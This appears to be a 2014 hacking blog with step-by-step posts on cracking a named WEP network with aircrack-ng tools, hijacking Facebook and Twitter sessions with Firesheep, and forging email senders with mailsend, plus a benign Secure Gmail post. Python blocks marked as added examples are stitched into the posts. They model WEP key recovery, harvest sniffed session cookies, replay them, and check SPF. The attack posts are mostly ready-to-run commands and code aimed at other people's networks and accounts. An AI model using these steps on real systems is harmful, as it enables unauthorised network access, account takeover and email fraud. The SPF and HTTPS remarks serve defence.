
Tuesday, 25 March 2014

Cracking WEP Using Backtrack - WiFi Hacking Part 2




In my previous article, WiFi Hacking Part 1, I listed the tools and hardware you need for WiFi hacking. If you have not read it, please go through it before reading this one.

In this article I will explain how you can crack a wireless network's WEP key using BackTrack in six easy steps.

WiFi Hacking Part 2

Commonly Used Terms :- 
  • WEP - Wired Equivalent Privacy, the original (and long broken) encryption standard for Wi-Fi networks
  • Access Point (AP) - a wireless router or base station
  • MAC Address - Media Access Control address, a unique hardware id assigned to wireless adapters and routers, written as six colon-separated pairs of hexadecimal digits (e.g. 98:fc:11:c9:14:22)
  • BSSID - the Access Point's MAC address
  • ESSID - the Access Point's broadcast name (the network name you see when you scan)


Cracking WEP Using Backtrack


Step -1 Booting Backtrack

Boot your copy of BackTrack from your USB drive. Once booted you will be prompted for login details: enter the username "root" and the password "toor", then enter "startx" to start the desktop. Once logged in, launch a new Konsole terminal by clicking the Konsole icon on the task bar. Now plug in your WiFi USB card and bring it up with the following command
ifconfig wlan0 up

where wlan0 is the name of the wireless card; it can be different on your system. To see all wireless cards connected to your system simply type "iwconfig"

Step -2 Putting your WiFi card on Monitor Mode

The purpose of this step is to put your card into what is called monitor mode. In monitor mode your card can listen to every 802.11 frame in the air, whether or not it is addressed to you; it is similar to promiscuous mode, which is used for packet sniffing on a wired LAN. You can put your card into monitor mode by entering the following command in a terminal
airmon-ng start (your interface)

Example :- airmon-ng start wlan0

A new interface, mon0 (or ath0 with the older madwifi Atheros driver), will be created. You can confirm that the new interface is in monitor mode by entering "iwconfig" as shown

Step -3 Monitor the air for WiFI connections 

Now that the card is in monitor mode, you need to scan the air for the wireless networks (WiFi connections) around you. For this you use a tool called "airodump-ng".

Start airodump-ng on the monitor interface by entering the following command
airodump-ng mon0

where mon0 is the new interface created in the previous step.
In the output, BSSID is the MAC address of the AP, CH is the channel the AP is transmitting on, ENC and CIPHER show the encryption type (WEP, or WPA/WPA2 with TKIP or CCMP), #Data counts the data frames seen so far, and ESSID is the name broadcast by the AP.

Stop the process by pressing "Ctrl+C" and select your target. Since I am only cracking WEP, I will take "johny" as my target from now on. Only networks whose ENC column says WEP can be attacked this way; WPA/WPA2 networks are not vulnerable to the attack described here.

Step -4 Capturing Data with Airodump 

To crack the WEP key you have to capture the target's data frames to a file. For this we use airodump-ng again, but with additional switches that lock it to a specific AP and channel. Restricting the capture to a single channel is important for speed: otherwise the card keeps hopping between all channels and misses most of the target's traffic. The general form is
airodump-ng --bssid (bssid of the target) -c (channel) -w (file name prefix) (interface)
My target is on channel 2 and has the BSSID "98:fc:11:c9:14:22", so I enter the following and save the captured data under the prefix "johnywep"
airodump-ng --bssid 98:fc:11:c9:14:22 -c 2 -w johnywep mon0
airodump-ng writes the capture to johnywep-01.cap (the number increases each time you run it with the same prefix). Do not close this terminal; run the next commands simultaneously in another terminal.


Step -5 Using Aireplay to Speed up the cracking  

Cracking the key needs a large number of data frames with distinct IVs (initialization vectors, the 3 bytes sent in the clear at the start of every WEP frame). The old FMS/KoreK statistical attacks needed hundreds of thousands; the PTW attack that aircrack-ng uses by default needs roughly 20,000 for a 40-bit key and 40,000 to 85,000 for a 104-bit key. There are two ways to collect them. The first is a passive attack: wait for a client to connect to the AP and capture whatever traffic it generates. This is very slow; on a quiet network it can take days or even weeks to collect enough.

The second is an active attack, which takes minutes: you generate the traffic yourself by injecting frames.

In the active attack you first perform a fake authentication (association) with the AP so that it accepts frames from your MAC address, then you capture an ARP request from the network and replay it over and over. The AP re-broadcasts every replayed ARP request encrypted under a fresh IV, which is exactly what the cracker needs. Both steps are done with a tool called "aireplay-ng".

Perform the fake authentication with the AP by entering the following command in a new terminal
aireplay-ng -1 3 -a (bssid of the target) (interface)

Here "-1" selects the fake authentication attack and "3" is the delay in seconds between re-associations (use 0 to authenticate only once). In my case I enter

aireplay-ng -1 3 -a 98:fc:11:c9:14:22 mon0

You should see "Association successful :-)". If it fails, make sure you are on the target's channel and that your card can inject (the -9 option of aireplay-ng tests injection). Once the fake authentication is done, it is time to generate and inject ARP (data) frames. Open yet another terminal and enter the following command
aireplay-ng -3 -b (bssid of the target) -h (MAC address of your card, shown by ifconfig mon0) (interface)

In my case I enter
aireplay-ng -3 -b 98:fc:11:c9:14:22 -h 00:c0:ca:50:f8:32 mon0
aireplay-ng waits until it sees an ARP request (if no client is active this can take a while; the deauthentication attack, -0, forces a connected client to re-ARP) and then replays it continuously. If this step is successful you will see the #Data count in the airodump-ng capture (step 4) rising fast, as shown


Wait until #Data reaches at least 25,000; better, wait until it is around 80,000 to 90,000. It is simple: the more data frames, the less time to crack. What aircrack-ng actually counts is unique IVs, so if the count stalls, keep capturing. Once you have captured enough packets, stop all the processes by pressing "Ctrl+C" or by simply clicking the close (x) button on the terminal

Step -6 Cracking WEP key using Aircrack 

Now it is time to recover the WEP key from the captured data; we use aircrack-ng for this

Enter the following command to crack the WEP key
aircrack-ng (name of the capture file from step 4)

In my case I enter 

aircrack-ng johnywep-01.cap
aircrack-ng reads the IVs out of the capture and runs the PTW attack; if there are not yet enough it says so and keeps re-reading the file as airodump-ng appends to it, so you can start it before the capture is finished. If the capture contains several networks, add -b (bssid of the target) to select the right one. Within a few minutes aircrack-ng will print "KEY FOUND!" with the key in hex (and as ASCII if it is printable), as shown
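Why step 5 needs tens of thousands of frames, and why replaying one ARP request delivers them, as an added example (this is not code from the post or from the aircrack-ng project): a minimal model of WEP itself. The RC4 cipher, the IV||key construction, the CRC-32 ICV and the fixed LLC/SNAP prefix of ARP frames are how WEP really works; the 40-bit key, the IV sequence and the ARP request bytes are constructed for the example.

```python
"""WEP in miniature: RC4 keyed with IV||key, CRC-32 ICV, 24-bit IV in the clear.

Added example, not code from the post or from aircrack-ng. KEY_40, the IV
values and ARP_REQUEST are constructed sample data.
"""
import struct
import zlib


def rc4(key: bytes, length: int) -> bytes:
    """RC4 keystream of `length` bytes for `key` (KSA followed by PRGA)."""
    s = list(range(256))
    j = 0
    for i in range(256):                       # key-scheduling algorithm
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):                    # pseudo-random generation
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Return IV || RC4(IV||key) XOR (plaintext || CRC32(plaintext)).
    The key-id byte that follows the IV in a real 802.11 frame is omitted."""
    if len(iv) != 3 or len(key) not in (5, 13):
        raise ValueError("WEP uses a 3-byte IV and a 40- or 104-bit key")
    icv = struct.pack("<I", zlib.crc32(plaintext) & 0xFFFFFFFF)
    body = plaintext + icv
    return iv + _xor(body, rc4(iv + key, len(body)))


def wep_decrypt(key: bytes, frame: bytes) -> bytes:
    """Strip the IV, regenerate the keystream, verify the ICV."""
    iv, ct = frame[:3], frame[3:]
    body = _xor(ct, rc4(iv + key, len(ct)))
    plaintext, icv = body[:-4], body[-4:]
    if struct.pack("<I", zlib.crc32(plaintext) & 0xFFFFFFFF) != icv:
        raise ValueError("ICV mismatch: wrong key or corrupted frame")
    return plaintext


def key_is_correct(key: bytes, frame: bytes) -> bool:
    """The ICV check as a boolean: how a cracker confirms a candidate key."""
    try:
        wep_decrypt(key, frame)
        return True
    except ValueError:
        return False


def keystream_from_known_plaintext(frame: bytes, known: bytes) -> bytes:
    """What aircrack-ng exploits: ARP frames start with a fixed LLC/SNAP
    header, so XORing the ciphertext with that known prefix yields the first
    keystream bytes for this frame's IV. Each distinct IV is one (IV,
    keystream) sample for the PTW/FMS statistical key recovery."""
    return _xor(frame[3:3 + len(known)], known)


def iv_reuse_leak(frame_a: bytes, frame_b: bytes) -> bytes:
    """Two frames under the same IV share a keystream, so the XOR of their
    ciphertexts is the XOR of their plaintexts, with no key involved."""
    if frame_a[:3] != frame_b[:3]:
        raise ValueError("frames use different IVs; no keystream reuse")
    n = min(len(frame_a), len(frame_b)) - 3
    return _xor(frame_a[3:3 + n], frame_b[3:3 + n])


def simulate_arp_replay(key: bytes, arp_request: bytes, n_frames: int):
    """Model of step 5: the AP re-encrypts the same replayed ARP request under
    a new IV each time. Returns (frames, number of unique IVs); that count,
    not the raw frame count, is what aircrack-ng needs to grow."""
    frames, ivs = [], set()
    for counter in range(n_frames):       # sequential IVs: an assumed AP behaviour
        iv = struct.pack(">I", counter & 0xFFFFFF)[1:]
        ivs.add(iv)
        frames.append(wep_encrypt(key, iv, arp_request))
    return frames, len(ivs)


# Constructed sample data (not captured traffic).
KEY_40 = bytes.fromhex("0102030405")                       # 40-bit WEP key
LLC_SNAP_ARP = bytes.fromhex("aaaa030000000806")           # fixed ARP prefix
ARP_REQUEST = LLC_SNAP_ARP + bytes.fromhex("0001080006040001") + bytes(20)
```

keystream_from_known_plaintext() is the per-frame sample the PTW attack collects; with enough distinct IVs the key bytes fall out statistically, which is why a #Data count that stalls at a few thousand gets you nowhere and why the tutorial waits for tens of thousands. simulate_arp_replay() shows the other half: the replayed ARP request never changes, but the AP's re-encryption of it does, one fresh IV per frame.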


Voila, you have successfully cracked the WEP key in six simple steps. To connect to the network, enter the hex key aircrack-ng printed, without the colons, as the WEP password.

Wifi Hacking - Part 1





As promised, I will be writing some articles on WiFi (wireless network) hacking over the next few days. In this first article I will list the tools and hardware you need for WiFi hacking.


Wireless adapter
The biggest requirement is a wireless adapter whose driver supports monitor mode and packet injection. Many cards can inject; search Google for the aircrack-ng compatibility list of WiFi cards, and once the card is set up verify it with aireplay-ng's injection test (the -9 option).

I use the Alfa AWUS036H, which is a very popular card and performs well with BackTrack.


BackTrack Live CD or USB
BackTrack is a Linux distro that ships with the essential tools required for penetration testing. I have already written articles on how to make a BackTrack live CD / USB. If you're new here I recommend reading the following articles to get a better understanding of what BackTrack is and how you can use it 

  • How to Install Backtrack - On Vmware
  • How To Make a Bootable Backtrack CD / USB


Monday, 24 March 2014

Hack Facebook / Twitter accounts using Fire Sheep




In my previous tutorial, Hack Facebook / Twitter accounts by stealing cookies, we hijacked a Facebook session by sidejacking, i.e. stealing the session cookies and injecting them into our own browser. In this tutorial we will do the same with a tool called Firesheep. The attack works when the attacker and the victim share a network whose traffic the attacker can see: a LAN, or more commonly an open public WiFi network such as those in airports, hotels, schools and colleges.



What is Fire Sheep
Firesheep is an extension developed by Eric Butler for the Firefox web browser. It uses a packet sniffer to intercept unencrypted session cookies from certain websites (such as Facebook and Twitter) as they are transmitted over the network, exploiting the fact that those sites sent the logged-in session cookie over plain HTTP. It shows the discovered identities in a sidebar in the browser and lets the user take over the victim's logged-in session by double-clicking the victim's name.


Hack Facebook / Twitter accounts  using Fire Sheep

Thing we Need :

1. Firefox Browser

2. Firesheep Firefox plugin 

Procedure :

1. First download and install the Firefox browser and the Firesheep add-on

2. Open Firefox, click the (1) View menu, then select (2) Sidebar, and finally click (3) Firesheep, or simply press Ctrl+Shift+S to open Firesheep


3. Firesheep now opens in the sidebar. Select your network interface under Preferences, as shown


4. Click the Start Capturing button and wait for a while


5. The sidebar lists the sessions it has sniffed, one per victim and site. Select the session you want


6. Firefox is now logged in to the victim's account with their session cookies. The same steps work for any site Firesheep has a handler for, such as Facebook or Twitter

Note :- This hack works only when the victim's traffic reaches your network interface: on an open (unencrypted) WiFi network, or on a LAN where you can see the victim's packets (on a switched LAN you normally see only your own traffic unless you also redirect it, e.g. by ARP spoofing). It also works only while the site sends its session cookie over plain HTTP; a site served entirely over HTTPS with the cookie's Secure flag set gives Firesheep nothing to capture.
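What Firesheep actually does with the packets it sees, as an added example (this is not Firesheep's own code, which is a Firefox extension written in JavaScript with a handler per site). The session cookie names listed per site are assumptions for illustration, and the sample requests are constructed, not captured traffic.

```python
"""Sidejacking in miniature: what Firesheep does with sniffed HTTP.

Added example, not Firesheep's code. SESSION_COOKIES is an assumption for
illustration (Firesheep shipped a handler per site listing the cookies
worth stealing); SAMPLE_PACKETS are constructed, not a real capture.
"""

# Assumed: which cookies carry the login session for each site.
SESSION_COOKIES = {
    "facebook.com": ("c_user", "xs"),
    "twitter.com": ("auth_token", "_twitter_sess"),
}


def parse_http_request(raw: bytes):
    """Split one plaintext HTTP request into (method, path, headers).
    Raises ValueError for anything that is not an HTTP request line
    (a TLS record, for instance), which is how HTTPS traffic drops out."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    lines = head.split("\r\n")
    method, path, version = lines[0].split(" ", 2)
    if not version.startswith("HTTP/"):
        raise ValueError("not an HTTP request")
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return method, path, headers


def parse_cookies(cookie_header: str) -> dict:
    """'a=1; b=2' -> {'a': '1', 'b': '2'}"""
    cookies = {}
    for part in cookie_header.split(";"):
        name, sep, value = part.strip().partition("=")
        if sep:
            cookies[name] = value
    return cookies


def site_for(host: str):
    """Map a Host header (with optional port) to a known site, or None."""
    host = host.split(":")[0].lower()
    for site in SESSION_COOKIES:
        if host == site or host.endswith("." + site):
            return site
    return None


def harvest_sessions(packets):
    """packets: raw HTTP requests as a sniffer sees them on open WiFi or on
    a LAN whose traffic reaches your interface. Returns the identities
    Firesheep would list in its sidebar: the site plus its session cookies."""
    found = []
    for raw in packets:
        try:
            _method, _path, headers = parse_http_request(raw)
        except (ValueError, IndexError):
            continue                     # not plaintext HTTP: nothing to steal
        site = site_for(headers.get("host", ""))
        if site is None or "cookie" not in headers:
            continue
        cookies = parse_cookies(headers["cookie"])
        needed = SESSION_COOKIES[site]
        if all(name in cookies for name in needed):
            found.append({"site": site,
                          "cookies": {n: cookies[n] for n in needed}})
    return found


def hijack_request(session: dict, path: str = "/") -> bytes:
    """The replay step behind 'double-click the victim's name': a request from
    the attacker's own client carrying the stolen cookies. The server cannot
    tell it from the victim's request, because the cookie *is* the login."""
    cookie = "; ".join(f"{k}={v}" for k, v in session["cookies"].items())
    return (f"GET {path} HTTP/1.1\r\nHost: www.{session['site']}\r\n"
            f"Cookie: {cookie}\r\nConnection: close\r\n\r\n").encode()


# Constructed sample traffic: a logged-in Facebook request, a logged-out
# Twitter request, an unrelated host, and the start of a TLS ClientHello.
SAMPLE_PACKETS = [
    b"GET /home.php HTTP/1.1\r\nHost: www.facebook.com\r\n"
    b"Cookie: datr=abc; c_user=100001; xs=sess123\r\n\r\n",
    b"GET / HTTP/1.1\r\nHost: twitter.com\r\nCookie: guest_id=v1\r\n\r\n",
    b"GET / HTTP/1.1\r\nHost: example.org\r\nCookie: auth_token=zzz\r\n\r\n",
    b"\x16\x03\x01\x00\xa5\x01\x00\x00\xa1\x03\x03",
]
```

The TLS record in the sample list is the whole defence in one line: a site that serves its logged-in pages over HTTPS and marks the session cookie Secure never puts that Cookie header on the wire in a form harvest_sessions() can read, so Firesheep's sidebar stays empty.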

Hope you enjoyed this tutorial. In my next article we will look at some of the countermeasures against these kinds of attacks. Till then, have a nice time...


How to Send Encrypted Mail through Gmail (Secure Gmail by Streak)




Secure Gmail encrypts and decrypts the emails you send in Gmail. The encryption happens entirely on your machine, so the unencrypted text never reaches Google's servers. This is useful if you don't want anyone but the intended recipient (companies, governments, etc.) to ever read your email.
First install the Secure Gmail by Streak extension in your Chrome browser.
Now reload Gmail and click the lock icon next to the Compose button. 
Compose your email and send it.
Enter a password; your recipient will need to enter the same password.
To decrypt the email, your recipient also needs the Secure Gmail extension installed, as well as the password. Note that only the message body is encrypted: the subject line and the recipient addresses stay visible to Google and to anyone else who can read the mail. Share the password over some channel other than email (in person, by phone, or a secure messenger); sending it in a second email defeats the purpose.

Email spoofing: The story of “Congratulations you have won a lottery” like spam emails




Mail vs E-mail
Back in the old days, when the internet was not so common, we had to rely on postal and courier services, and the only thing that bugged me about traditional mail was its speed. Then email came along. It offers numerous benefits: it is blazing fast, most of the time it is free, you can attach anything from pictures to videos, from a management point of view you don't have to maintain a paper folder, and last but not least it is environmentally friendly. In short, email is one of the greatest inventions of all time.
What is spam?
I'm not that old, but back in the dial-up days there was no such thing as Gmail; most people used Hotmail or Yahoo Mail, and the problem with both was spam. Spam is unsolicited email, mostly used for marketing a product or service, but there are cases where spam has been used to compromise a person through social engineering or session hijacking. Phishing is closely associated with spoofed emails: phishing is "the fraudulent practice of sending emails purporting to be from reputable companies in order to induce individuals to reveal personal information, such as passwords and credit card numbers".
If you only use Gmail you are lucky, because Google has a very intelligent and sophisticated spam filtering mechanism. Frankly, I don't get spam at all in my Gmail, but in the case of Ymail or Hotmail... let's just not talk about it.
What is e-mail spoofing?
In today's article I will focus on email spoofing. So the first question you may ask is: what is spoofing? Spoofing, in simple terms, is Alice pretending to be Bob. Email spoofing is Alice sending an email to Eve with the From: header set to Bob's address. When Eve receives the email she thinks Bob sent it, but he did not. This works because SMTP never verifies the From: header; it is just text inside the message, separate from the envelope sender the mail server sees.
*PLEASE NOTE THIS TUTORIAL IS FOR EDUCATIONAL PURPOSES ONLY. GENERATING SPOOFED EMAILS OR SPAM IS ILLEGAL AND PUNISHABLE UNDER THE LAW. YOU WILL BE RESPONSIBLE FOR YOUR ACTIONS.*
Platform: Windows 7 (also works on Mac and Linux)
How to spoof an e-mail ?
There are different ways to spoof an email, but I am going to use the "mailsend" program. mailsend is a small command-line SMTP client (not to be confused with the Sendmail mail server) that sends an email through an SMTP server you specify.
1. Go to Google and search for "sendmail google code" (the project you want is "mailsend"). Open the page highlighted below.
2. This is what mailsend on Google Code looks like.
3. Go to the download section and download the appropriate file; as I am on Windows, I download the ".exe" file.
Open the command line and run "mailsend". The first thing it asks for is the SMTP server. This is the critical part: if you don't provide the right SMTP server your email will not be sent. You have to choose an SMTP server that accepts mail from you without authentication, typically your own ISP's outgoing mail server used from inside its network. I will be using PTCL's SMTP server, "smtp.ptcl.com.pk", which runs on port 25.
Next, in "from", enter the email address of the person you want to spoof. In this case I am making a spoof email from Bill Gates, i.e. "billgates@microsoft.com". Nothing checks this value; it simply becomes the From: header of the message. Receivers that check SPF, DKIM and DMARC, however, will see that the message arrived from PTCL's server rather than from one authorised by the spoofed domain, and will flag it as spam or reject it outright; that is why such spoofs rarely reach a modern inbox cleanly.
Provide the email address of the receiver; I am giving my own email address.
Enter the subject and then type your message.
When the message is complete, press Enter, type a single dot "." on a line by itself and press Enter again (this is how SMTP marks the end of the message body); a message will pop up saying your email has been sent.
Here you can see my inbox has received the spoofed email.
Inbox overview.
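The exchange described above, and the check a receiving server runs on it, as an added example (this is not the mailsend tool's code). It builds a message whose From: header names someone other than the envelope sender, lists the SMTP commands a client like mailsend sends on port 25 (including the dot-stuffing that makes the lone "." the end-of-message marker), and evaluates a minimal SPF policy against the connecting IP. The domain names, IP addresses and SPF records are constructed from the RFC 5737/2606 example ranges, not real published records.

```python
"""Envelope versus header, and the SPF check that catches the mismatch.

Added example, not mailsend's code. SPF_RECORDS and every address below
are constructed for the example.
"""
import ipaddress
from email.message import EmailMessage


def build_message(header_from: str, to: str, subject: str, body: str) -> bytes:
    """The From: header is just another line of the message; SMTP never
    compares it with the connecting host or the envelope sender."""
    msg = EmailMessage()
    msg["From"] = header_from
    msg["To"] = to
    msg["Subject"] = subject
    msg.set_content(body)
    return msg.as_bytes()


def smtp_client_transcript(helo: str, envelope_from: str, rcpt: str,
                           message: bytes) -> list:
    """The commands the client sends on port 25. MAIL FROM is the envelope
    sender (what SPF checks); the From: header travels inside DATA. Lines
    starting with '.' are dot-stuffed (RFC 5321 4.5.2), which is why a lone
    '.' line ends the body."""
    lines = ["EHLO " + helo,
             f"MAIL FROM:<{envelope_from}>",
             f"RCPT TO:<{rcpt}>",
             "DATA"]
    for line in message.decode().split("\n"):
        line = line.rstrip("\r")
        lines.append("." + line if line.startswith(".") else line)
    lines += [".", "QUIT"]
    return lines


def spf_check(records: dict, domain: str, client_ip: str, depth: int = 0) -> str:
    """Minimal SPF (RFC 7208) evaluator for ip4:, include: and 'all'.
    `records` stands in for DNS TXT lookups. Returns pass, fail, softfail,
    neutral, none or permerror."""
    if depth > 10:
        return "permerror"                       # include: loop guard
    record = records.get(domain)
    if not record or not record.startswith("v=spf1"):
        return "none"
    ip = ipaddress.ip_address(client_ip)
    qualifiers = {"+": "pass", "-": "fail", "~": "softfail", "?": "neutral"}
    for term in record.split()[1:]:
        qualifier = "+"
        if term[0] in qualifiers:
            qualifier, term = term[0], term[1:]
        if term.startswith("ip4:"):
            if ip in ipaddress.ip_network(term[4:], strict=False):
                return qualifiers[qualifier]
        elif term.startswith("include:"):
            if spf_check(records, term[8:], client_ip, depth + 1) == "pass":
                return qualifiers[qualifier]
        elif term == "all":
            return qualifiers[qualifier]
    return "neutral"                             # no mechanism matched


def sender_domain(address: str) -> str:
    """'Name <user@example.com>' -> 'example.com'"""
    return address.rstrip(">").rsplit("@", 1)[1].lower()


# Constructed example zone (not real DNS records).
SPF_RECORDS = {
    "example.com": "v=spf1 ip4:192.0.2.0/24 include:_spf.example.net -all",
    "_spf.example.net": "v=spf1 ip4:198.51.100.5 -all",
}
```

A receiver applies spf_check() to the domain of the envelope sender (and DMARC additionally requires that the From: header domain line up with whatever passed SPF or DKIM). A spoof relayed through an ISP server at an address outside the spoofed domain's record comes back "fail", which is the signal spam filters act on today.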

Author: This article was written by Fowz Masood, who completed his bachelor's in Electrical Engineering (Computer Engineering) and is pursuing a master's degree in Computer Communications and Security at SEECS-NUST, Pakistan. He has a wide variety of interests in computer security and network security.